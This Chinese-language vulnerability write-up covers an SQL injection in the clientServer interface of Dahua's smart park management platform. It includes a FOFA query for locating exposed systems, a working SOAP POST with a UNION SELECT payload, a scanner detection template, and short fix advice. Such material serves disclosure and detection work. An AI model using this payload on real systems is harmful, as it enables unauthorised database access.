Advertisement

大华智慧园区综合管理平台 clientServer SQL注入漏洞

阅读量:

产品简介

基于大华科技打造的智慧园区综合管理平台

漏洞概述

该系统在处理大华智慧园区综合管理平台的clientServer接口时未能有效过滤用户的输入数据,并将其未经验证的内容直接整合到系统中的SQL查询语句中。这引发了严重的SQL注入漏洞。潜在的远程未授权攻击者可利用此漏洞获取敏感信息,并从而进一步可能导致目标系统的权限被非法获取。

复现环境

FOFA:app=”dahua-智慧园区综合管理平台”

漏洞复现

Poc

复制代码 
 POST /portal/services/clientServer HTTP/1.1

    
 Host: your-ip
    
 User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
    
 Content-Type: text/xml;charset=UTF-8
    
  
    
 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:cli="http://clientServer.webservice.dssc.dahua.com">
    
   <soapenv:Header/>
    
   <soapenv:Body>
    
   <cli:getGroupInfoListByGroupId>
    
     <!--type: string-->
    
       <arg0>-1) UNION ALL SELECT 1,2,3,4,version()-- -</arg0>
    
     <!--type: long-->
    
     <arg1>1</arg1>
    
     </cli:getGroupInfoListByGroupId>
    
     </soapenv:Body>
    
   </soapenv:Envelope>

检测规则POC编写

复制代码 
 params: []

    
 name: 大华智慧园区综合管理平台 clientServer SQL注入漏洞
    
 set: {}
    
 rules:
    
 - method: POST
    
   path: /portal/services/clientServer
    
   headers:
    
     Content-Length: "113"
    
     Content-Type: text/xml;charset=UTF-8
    
     User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like
    
       Gecko) Chrome/41.0.2226.0 Safari/537.36
    
   body: |-
    
     <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:cli="http://clientServer.webservice.dssc.dahua.com">
    
       <soapenv:Header/>
    
       <soapenv:Body>
    
       <cli:getGroupInfoListByGroupId>
    
     <!--type: string-->
    
       <arg0>-1) UNION ALL SELECT 1,2,3,4,version()-- -</arg0>
    
     <!--type: long-->
    
     <arg1>1</arg1>
    
     </cli:getGroupInfoListByGroupId>
    
     </soapenv:Body>
    
       </soapenv:Envelope>
    
   search: ""
    
   followredirects: false
    
   expression: response.status == 200 && response.body.bcontains(b'dahua.com') && response.body.bcontains(b'5')&&
    
     response.body.bcontains(b'-log')
    
 groups: {}
    
 detail:
    
   author: ""
    
   links: []
    
   description: ""
    
   version: ""

修复建议

禁止访问来源地址。除非必要,请避免将系统对外开放于互联网。建议升级至安全版本。

全部评论 (0)

还没有任何评论哟~

相关文章推荐

大华智慧园区综合管理平台 clientServer SQL注入漏洞

产品简介 “大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。

大华智慧园区综合管理平台 clientServer SQL注入漏洞复现

0x01产品简介 “大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。

【漏洞复现】大华智慧园区综合管理平台clientServer存在SQL注入漏洞

漏洞描述 大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。

大华智慧园区综合管理平台SQL注入漏洞

大华智慧园区综合管理平台SQL注入漏洞 一、产品简介 二、漏洞概述 三、复现环境 四、漏洞复现 burpPoC验证 查询当前用户 小龙POC检测: 五、修复建议 免责声明:请勿利用文章内的相关技术从事...

大华智慧园区综合管理平台searchJson SQL注入漏洞

一、漏洞简介 “大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。

大华智慧园区综合管理平台SQL注入漏洞复现

0x01产品简介 “大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。

大华智慧园区综合管理平台 getNewStaypointDetailQuery SQL注入漏洞复现

0x01产品简介 “大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。

大华智慧园区综合管理平台carQuery接口SQL注入漏洞

漏洞描述 大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。

大华智慧园区综合管理平台pageJson接口SQL注入漏洞

漏洞描述 大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。由于该平台未对用户...

【1day】复现大华智慧园区综合管理平台SQL注入漏洞

目录 一、漏洞描述 二、影响版本 三、资产测绘 四、漏洞复现 一、漏洞描述 大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安...